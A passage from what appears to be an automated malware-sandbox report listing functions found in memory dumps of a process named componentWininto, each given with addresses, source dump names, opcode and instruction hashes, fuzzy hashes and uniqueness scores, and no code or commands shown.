                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2bc991a2362d1f628e6a6099437e8b780e3d159fda1957b4a192e5942bfa0787
                                                  • Instruction ID: 307100f955d471309deee2c26a93507bfefa299b21cd403279b471543eee5411
                                                  • Opcode Fuzzy Hash: 2bc991a2362d1f628e6a6099437e8b780e3d159fda1957b4a192e5942bfa0787
                                                  • Instruction Fuzzy Hash: 59416916F0E25B49F634ABED28714FC2B40DF80B35B1602B7E49D8E0E39C9C290542E5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAEDC82 Relevance: .3, Instructions: 330COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 24c01a2a720426cfc8be655a1006222c30ec10f379a301008b19ac6d240b2b57
                                                  • Instruction ID: 89ab744cea3277b50a35c956f5572c4c1baf0b815fcb44fddb0f2c8f622f5394
                                                  • Opcode Fuzzy Hash: 24c01a2a720426cfc8be655a1006222c30ec10f379a301008b19ac6d240b2b57
                                                  • Instruction Fuzzy Hash: 36C1E530B1EA4A8FE759DB58C0A06B4B7A1FF58310F554179D08ECBA96CB68F951CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB73B2 Relevance: .3, Instructions: 323COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 713d4dcc9c1743be6aa155014139ce1510b3dd9ffdf8482c7308d3921422ce88
                                                  • Instruction ID: d2ae61636da97d3903e910dfe0a8903a73e575b9ba482c19506d8d046115980d
                                                  • Opcode Fuzzy Hash: 713d4dcc9c1743be6aa155014139ce1510b3dd9ffdf8482c7308d3921422ce88
                                                  • Instruction Fuzzy Hash: 65C1F630A0DA5A8FE75DDB68C0A16A4BBA1FF59320F45517DC04FC7A96CB28B951CF80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB190E Relevance: .3, Instructions: 316COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d9f73cff7cae53c02bab4e26c1032a7069985c5c534370db66d95635ea7adbee
                                                  • Instruction ID: 5716725c02b62bbb7a072963bd62293a8e7b9e2a3c400552606a88da3e2cf7a8
                                                  • Opcode Fuzzy Hash: d9f73cff7cae53c02bab4e26c1032a7069985c5c534370db66d95635ea7adbee
                                                  • Instruction Fuzzy Hash: EC819B31B7D6990BF71C9A58D4A22B833C1FB86328F25167DD4DBC36D7E828A8434785
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB68E6 Relevance: .3, Instructions: 306COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 552e7ab644ae1ab0c1eb362bd77b85f114eb781e206cfeacc6efcb3dd7fa2658
                                                  • Instruction ID: 24582ee67db47ff0297428ee12200f7cb9fbb1ba8c89241fa88cbe48c14e5319
                                                  • Opcode Fuzzy Hash: 552e7ab644ae1ab0c1eb362bd77b85f114eb781e206cfeacc6efcb3dd7fa2658
                                                  • Instruction Fuzzy Hash: 0FA12731B0EA5A4FEB3D9BA88461575FBE0EF45320B16557ED08FC71A2DA28F9018B41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB4D97 Relevance: .3, Instructions: 299COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0706725b339da3f2215473cc895cb2ffc7276bbc255f0d75ed74eae98b7e2570
                                                  • Instruction ID: 35a14f2b78fc171d9fc8d2bbc2120acafefe86dcd65b3f192bcd73d5a9690b6d
                                                  • Opcode Fuzzy Hash: 0706725b339da3f2215473cc895cb2ffc7276bbc255f0d75ed74eae98b7e2570
                                                  • Instruction Fuzzy Hash: 8521A212F0F5BF86FA3D96E828311B826405F15335F1A26BED44F8B0E7DC0C2A845E92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB0167 Relevance: .3, Instructions: 299COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f0902fbfa7274817b5e358cf48b9753a716384632b5850b2a8d2dda2e9b168f8
                                                  • Instruction ID: 10af544ee5b5be4332fac78be8b257948587ee78fcc63ebd44c990abf6735861
                                                  • Opcode Fuzzy Hash: f0902fbfa7274817b5e358cf48b9753a716384632b5850b2a8d2dda2e9b168f8
                                                  • Instruction Fuzzy Hash: 2721D317B0E56A8BF33C65AA28755F81A405F54B76F0A12B7D44FCB1E38C0829454BD6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB7C20 Relevance: .3, Instructions: 285COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 345dc127c3e7b0e4db2891c84c702f818d46963965e71fea5291fd3f353ea1ad
                                                  • Instruction ID: 35bb9d7eeb42576c80fadae074610d3b0ce29f9f4bb11d5b985e4f912d4a880e
                                                  • Opcode Fuzzy Hash: 345dc127c3e7b0e4db2891c84c702f818d46963965e71fea5291fd3f353ea1ad
                                                  • Instruction Fuzzy Hash: 36B1C33061A56A8FEB5CCF18C0E05B037A1FF49320B5552BDC85B8B69BC638F981CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAD1728 Relevance: .3, Instructions: 284COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bad0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 64f5c78668299bd06f4db8e8e8d0b8c9ca8fb273f4b8e2457d22ad133b2024bb
                                                  • Instruction ID: f01c197774c2fffbead613b123b9a06cc9223e3339d0079329567122a0d958f5
                                                  • Opcode Fuzzy Hash: 64f5c78668299bd06f4db8e8e8d0b8c9ca8fb273f4b8e2457d22ad133b2024bb
                                                  • Instruction Fuzzy Hash: 8A91EE31B1DA894FDB58DF5888615B977E2EFE8300B15427EE49DC32A2DE34AD02C781
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBED46 Relevance: .3, Instructions: 263COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 57df2c6caa0b033d3064949c6e410f845e659abbbd5641440d61880ef5f43066
                                                  • Instruction ID: 0ff7d32173c66b522bbca067ebfefd5c74a3800d77467b0978807a4607f30ec5
                                                  • Opcode Fuzzy Hash: 57df2c6caa0b033d3064949c6e410f845e659abbbd5641440d61880ef5f43066
                                                  • Instruction Fuzzy Hash: 40814731A0EB5A8FE3BC8A68946147477E0EF45320F15197EE48FC71A3DE28B9028B41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAF2236 Relevance: .3, Instructions: 259COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 54eb94695fd7c97bf3ae39310e8c453dafa814dd8da4ee0a05b63f066db14eb3
                                                  • Instruction ID: 9a6b85373f6af580497a7947fcd6ea88816c189d2caf34061cd108747fc04170
                                                  • Opcode Fuzzy Hash: 54eb94695fd7c97bf3ae39310e8c453dafa814dd8da4ee0a05b63f066db14eb3
                                                  • Instruction Fuzzy Hash: 59816A31F0DB4A4FE3389BE894650B57BE0EF55310B56057EE49EC31A3DEA8BA028741
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAEB241 Relevance: .2, Instructions: 247COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 43691886362e61660c32e42daf519cd0f16b20b54c85ac30bf771de40fa3966d
                                                  • Instruction ID: 869b2bea7cf0979200f7ccfd46a2db078c5a93487fe58d1aa9b14395e14a142c
                                                  • Opcode Fuzzy Hash: 43691886362e61660c32e42daf519cd0f16b20b54c85ac30bf771de40fa3966d
                                                  • Instruction Fuzzy Hash: 1B710735B0D94E8FEB78DB48C8AA5B833D1FF44311B950279D45EC39B1DE68E9068781
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB4A49 Relevance: .2, Instructions: 247COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 754f9ef194218c90e271928b9a50941ebd6f31964afb780e4911f347de7ebda6
                                                  • Instruction ID: aad879bbe7b7b18b0e3789a529bd95a14bd91ae062e5af33f30405bc5979b6d1
                                                  • Opcode Fuzzy Hash: 754f9ef194218c90e271928b9a50941ebd6f31964afb780e4911f347de7ebda6
                                                  • Instruction Fuzzy Hash: 2D712431A0E95D4FE77CDA5888666B437D0EF44330B1212BDD19FC35B2DE18AA068F85
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBCF29 Relevance: .2, Instructions: 244COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 51887670ff9d7ff6f6c073778ca59b2715092ba878c933e4ff55718b4758c243
                                                  • Instruction ID: 1ece73f658ab5c2ae89ff5c039294be77616418223d864c69e801d208a0f60e2
                                                  • Opcode Fuzzy Hash: 51887670ff9d7ff6f6c073778ca59b2715092ba878c933e4ff55718b4758c243
                                                  • Instruction Fuzzy Hash: 4B711331A0E55E4FFB7CDA5888665B437D0FF48321B1612B9D09FC35B2DB18AA078B81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBDAEB Relevance: .2, Instructions: 239COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fee3f37e54be11dfd191516a3af9f4becd4c5118e92d00929d31d1bd8eaaced7
                                                  • Instruction ID: 50946987a3719aa134e8bf893ece5104cc6a4f816fc1fee925e932e5302f93fc
                                                  • Opcode Fuzzy Hash: fee3f37e54be11dfd191516a3af9f4becd4c5118e92d00929d31d1bd8eaaced7
                                                  • Instruction Fuzzy Hash: 3881A130E1E55E8FEBA8DBA488646BC7BB1EF59310F5505BAD00FD71E2DB286941CB01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAEE3CF Relevance: .2, Instructions: 235COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fd2ee1b52af4b699497d97bb65567914808cb497cbcc6b6cb4aadd2a4af7d48e
                                                  • Instruction ID: 51f95980c02d4058373527ee7155af9f796fc45edd75995de83c97d0de26cd84
                                                  • Opcode Fuzzy Hash: fd2ee1b52af4b699497d97bb65567914808cb497cbcc6b6cb4aadd2a4af7d48e
                                                  • Instruction Fuzzy Hash: 18918E706196098FEB5CCF48D0E15B137A1FF49310B5146BCD84E8B69ADB78F992CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBB5DE Relevance: .2, Instructions: 235COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e79afc20c683c287bb6b3f1a173d32ed99915dec95a749aa664a96227317d910
                                                  • Instruction ID: f37287f8e7ce22b6d1867332b46e8f9b98536533e1c0974f3d12fa59224cb86e
                                                  • Opcode Fuzzy Hash: e79afc20c683c287bb6b3f1a173d32ed99915dec95a749aa664a96227317d910
                                                  • Instruction Fuzzy Hash: D1616A34A2DA690BF31C9A5CD8A21B873D0FB49328F95157DD4DBC3693D928F9134B81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB0DE6 Relevance: .2, Instructions: 232COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 68214423c0cf11cbbbfb27339036d074ef46990c122cdcce2548c99890b82c3a
                                                  • Instruction ID: b0364bcfd06704e2f18cb607e97d2c3b40b46a9821d7bef4530629adb4e29a65
                                                  • Opcode Fuzzy Hash: 68214423c0cf11cbbbfb27339036d074ef46990c122cdcce2548c99890b82c3a
                                                  • Instruction Fuzzy Hash: 3E714B31B0F61A4FE33D4A99946197977E1EF89B30F16117ED04F871A2CE2979028BD1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB8B41 Relevance: .2, Instructions: 225COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3cc9b72dedfae0d32ef0e52ff23de3455ca3a5c543d52f5276eae08f2c564ecd
                                                  • Instruction ID: 0e633a059c22ab4dadb740da19405ed5eab6cc07d3c175017a3bcd43a793ec69
                                                  • Opcode Fuzzy Hash: 3cc9b72dedfae0d32ef0e52ff23de3455ca3a5c543d52f5276eae08f2c564ecd
                                                  • Instruction Fuzzy Hash: 2E81E430A0AB5A8FD36CDF64C1A157177A1FF14320B51657EC49FC76A2CA2ABA42CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAEF411 Relevance: .2, Instructions: 223COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e82ee5cf6cac4e3ea285a57e23736cb15226192dffcbb7a52587b291b7f20ccc
                                                  • Instruction ID: 454b13addfbfba7f3d0c0e9d0dfc6dffb206654db1735a4da42f42dc9fc933df
                                                  • Opcode Fuzzy Hash: e82ee5cf6cac4e3ea285a57e23736cb15226192dffcbb7a52587b291b7f20ccc
                                                  • Instruction Fuzzy Hash: CD81DE30A0AB4A8FE379DB54D1A457177E1FF14304B11497EC48EC7AA2CBBAB942CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAF4481 Relevance: .2, Instructions: 221COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ef85ce36a39fce06bb7d9ce4ca1e381cc3898729efda2817d456a7639f3fc91a
                                                  • Instruction ID: e117a9970919bcfc572e1da1ede3b87ee24a1c5530c6c51715ff7929ffc32730
                                                  • Opcode Fuzzy Hash: ef85ce36a39fce06bb7d9ce4ca1e381cc3898729efda2817d456a7639f3fc91a
                                                  • Instruction Fuzzy Hash: 3781A130B0AB0A8FE3A5DB95C1A05B17BE1FF04304B51457DC49AC7AB6CEB9B942CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB1932 Relevance: .2, Instructions: 220COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c0a3b748fc887df45efd9b07d1d54e39cf603fd0ffb83d0952b9ff013f145d6c
                                                  • Instruction ID: a5892da78649c85d5bb41eab9552f892de68bc2fca6f21c039d7200ccaafd26d
                                                  • Opcode Fuzzy Hash: c0a3b748fc887df45efd9b07d1d54e39cf603fd0ffb83d0952b9ff013f145d6c
                                                  • Instruction Fuzzy Hash: F6617930B2E56A4FF72C8659D4A05B8B391FF85320F15167DD08BC75ABD928BA438B81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAEBB1B Relevance: .2, Instructions: 217COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 85064d5497b8a2eb499fa6d30281a818450b36d2d5ed0b9081dd012052811b37
                                                  • Instruction ID: 26a8ac4424e1817e17bcae4f1783f14f02cf2784f0d691a32bfbf35941dd13d2
                                                  • Opcode Fuzzy Hash: 85064d5497b8a2eb499fa6d30281a818450b36d2d5ed0b9081dd012052811b37
                                                  • Instruction Fuzzy Hash: 0D71B330E1E54E8FEB65DBA488A96BDBBB1FF49300F9105BAD00ED71E5DE6869418700
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE39FA Relevance: .2, Instructions: 209COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 553b9fd9ed2abcdad7ce806b129dbd0396c6c04433e9907193fe9e965d92c1bb
                                                  • Instruction ID: 9a772c57ce12d3b458e5551b2420c4f0bdde507467634ec412180597ac9230bd
                                                  • Opcode Fuzzy Hash: 553b9fd9ed2abcdad7ce806b129dbd0396c6c04433e9907193fe9e965d92c1bb
                                                  • Instruction Fuzzy Hash: 7051342370D4694AE729BBBDBCA44FABFA0EF5637AB0402B7D189CE093D9205045C780
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAF2E4E Relevance: .2, Instructions: 205COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a1b4bd78b61d726fac2944abe6ea798b7cedc553c47bb09eaa35182e2abb9982
                                                  • Instruction ID: b840f5a9d73b88f36fc2f4d97864173b7a04a5ad55e914e6190c8e4611d3e1e1
                                                  • Opcode Fuzzy Hash: a1b4bd78b61d726fac2944abe6ea798b7cedc553c47bb09eaa35182e2abb9982
                                                  • Instruction Fuzzy Hash: FB71077070EB8A8FE759DBA8C4A05E4BBA0FF15300F9541B9D04AC76D7CB68B951C790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAF0F5B Relevance: .2, Instructions: 204COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fea41bb5b670c021bd334fa0e7cb4de49fc0968a8a13484aedffe70c7113caee
                                                  • Instruction ID: 04c1d1f9932874caf1a601882f9fb4527fe3ea67d27e5eb140a15a37e756260e
                                                  • Opcode Fuzzy Hash: fea41bb5b670c021bd334fa0e7cb4de49fc0968a8a13484aedffe70c7113caee
                                                  • Instruction Fuzzy Hash: 7261D130F1964E8FEBA4DBA4C4659FCBBB1EF54300F51017AD00ED71A1EA786945C740
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBA826 Relevance: .2, Instructions: 203COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: db710418952587760e500672a65938e98e7bb36f1c8fcc18e470e16f40800d63
                                                  • Instruction ID: 3c312540695563530f457ee5fea45fcd30ef386f7b0753584cc4ea11a36693f6
                                                  • Opcode Fuzzy Hash: db710418952587760e500672a65938e98e7bb36f1c8fcc18e470e16f40800d63
                                                  • Instruction Fuzzy Hash: A9515A31B0EA5E4BF73D4A6894601757BE0EF41320B4612BEE08BC75A3DE19A906CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE294A Relevance: .2, Instructions: 201COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f4dab9d5dc2e01dd1601bbc2ea61558af5981204bb6ea02569a53b635a61cda9
                                                  • Instruction ID: ff1f55feff66ea6a142af28ad71a6029c5211a79f1331888c77a92d005f4704f
                                                  • Opcode Fuzzy Hash: f4dab9d5dc2e01dd1601bbc2ea61558af5981204bb6ea02569a53b635a61cda9
                                                  • Instruction Fuzzy Hash: 1481C970E1961D8FDBA4EB98C855BECB7B1FF58301F5142B9D00DE7292DE746A818B40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAFBFD8 Relevance: .2, Instructions: 186COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6da94bba6b073619c00a11a351d1aba526b890377c988a54f656eda133244ae6
                                                  • Instruction ID: 2cf220b818e4db2c3a2789fcc407123309933b616a400f045e588fc56e954301
                                                  • Opcode Fuzzy Hash: 6da94bba6b073619c00a11a351d1aba526b890377c988a54f656eda133244ae6
                                                  • Instruction Fuzzy Hash: 67514A21B1D59E4AE739A36C54316F87790FF6532DF0442FBE4CE8A0EBDD2865868340
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB7B1F Relevance: .2, Instructions: 182COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
